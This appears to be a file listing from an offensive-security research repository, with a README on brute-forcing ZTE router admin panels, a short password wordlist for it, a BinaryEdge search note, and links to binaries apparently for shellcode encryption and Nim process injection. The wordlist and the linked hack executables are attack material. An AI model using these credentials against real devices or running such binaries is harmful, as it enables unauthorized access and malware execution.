--------------------------------------------------------------------------------
# ZTE crack

Brute ZTE admin panel

![meow](./2023-01-15_05-56.png?raw=true)

--------------------------------------------------------------------------------
/hvck/2023-01-12-zte-crack/wordlist.txt:
--------------------------------------------------------------------------------
admin
12345
password
Rh8Rw838@1
pa$$w0rd
qwerty
12345678
--------------------------------------------------------------------------------
/hvck/2023-03-04-binary-edge/2023-03-05_17-08.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/hvck/2023-03-04-binary-edge/2023-03-05_17-08.png
--------------------------------------------------------------------------------
/hvck/2023-03-04-binary-edge/README.md:
--------------------------------------------------------------------------------
# BinaryEdge API

Search via binary edge API

![meow](./2023-03-05_17-08.png?raw=true)

--------------------------------------------------------------------------------
/hvck/2023-03-05-encshell/2023-03-08_20-56.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/hvck/2023-03-05-encshell/2023-03-08_20-56.png
--------------------------------------------------------------------------------
/hvck/2023-03-05-encshell/enc.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/hvck/2023-03-05-encshell/enc.exe
--------------------------------------------------------------------------------
/hvck/2023-03-05-encshell/hack.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/hvck/2023-03-05-encshell/hack.exe
--------------------------------------------------------------------------------
/hvck/2023-03-05-encshell/hack0.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/hvck/2023-03-05-encshell/hack0.exe
--------------------------------------------------------------------------------
/hvck/2023-03-05-encshell/meow.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/hvck/2023-03-05-encshell/meow.bin
--------------------------------------------------------------------------------
/hvck/2024-05-01-nim-injection/hack.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/hvck/2024-05-01-nim-injection/hack.exe
--------------------------------------------------------------------------------
/hvck/2024-05-01-nim-injection/hack2.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/hvck/2024-05-01-nim-injection/hack2.exe
--------------------------------------------------------------------------------
/hvck/2024-05-01-nim-injection/hello.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/hvck/2024-05-01-nim-injection/hello.exe
--------------------------------------------------------------------------------
/hvck/2024-05-01-nim-injection/hello.nim:
--------------------------------------------------------------------------------
echo "hello world!"
--------------------------------------------------------------------------------
/hvck/2024-05-01-nim-injection/img/2024-06-01_12-02.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/hvck/2024-05-01-nim-injection/img/2024-06-01_12-02.png
--------------------------------------------------------------------------------
/hvck/2024-05-01-nim-injection/img/2024-06-01_12-08.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/hvck/2024-05-01-nim-injection/img/2024-06-01_12-08.png
--------------------------------------------------------------------------------
/hvck/2024-05-01-nim-injection/img/2024-06-01_12-10.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/hvck/2024-05-01-nim-injection/img/2024-06-01_12-10.png
--------------------------------------------------------------------------------
/hvck/2024-05-01-nim-injection/img/2024-06-01_12-10_1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/hvck/2024-05-01-nim-injection/img/2024-06-01_12-10_1.png
--------------------------------------------------------------------------------
/hvck/2024-05-01-nim-injection/img/2024-06-01_12-11.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/hvck/2024-05-01-nim-injection/img/2024-06-01_12-11.png
--------------------------------------------------------------------------------
/hvck/2024-05-01-nim-injection/img/2024-06-01_12-12.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/hvck/2024-05-01-nim-injection/img/2024-06-01_12-12.png
--------------------------------------------------------------------------------
/hvck/2024-05-01-nim-injection/img/2024-06-01_12-15.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/hvck/2024-05-01-nim-injection/img/2024-06-01_12-15.png
--------------------------------------------------------------------------------
/hvck/2024-05-01-nim-injection/img/2024-06-01_12-42.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/hvck/2024-05-01-nim-injection/img/2024-06-01_12-42.png
--------------------------------------------------------------------------------
/hvck/2024-05-01-nim-injection/img/2024-06-01_12-45.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/hvck/2024-05-01-nim-injection/img/2024-06-01_12-45.png
--------------------------------------------------------------------------------
/hvck/2024-05-01-nim-injection/img/2024-06-01_12-53.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/hvck/2024-05-01-nim-injection/img/2024-06-01_12-53.png
--------------------------------------------------------------------------------
/hvck/2024-05-01-nim-injection/img/2024-06-01_12-55.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/hvck/2024-05-01-nim-injection/img/2024-06-01_12-55.png
--------------------------------------------------------------------------------
/hvck/2024-05-01-nim-injection/img/2024-06-01_12-56.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/hvck/2024-05-01-nim-injection/img/2024-06-01_12-56.png
--------------------------------------------------------------------------------
/hvck/2024-05-01-nim-injection/xorE.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/hvck/2024-05-01-nim-injection/xorE.exe
--------------------------------------------------------------------------------
/meow.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/meow.png
--------------------------------------------------------------------------------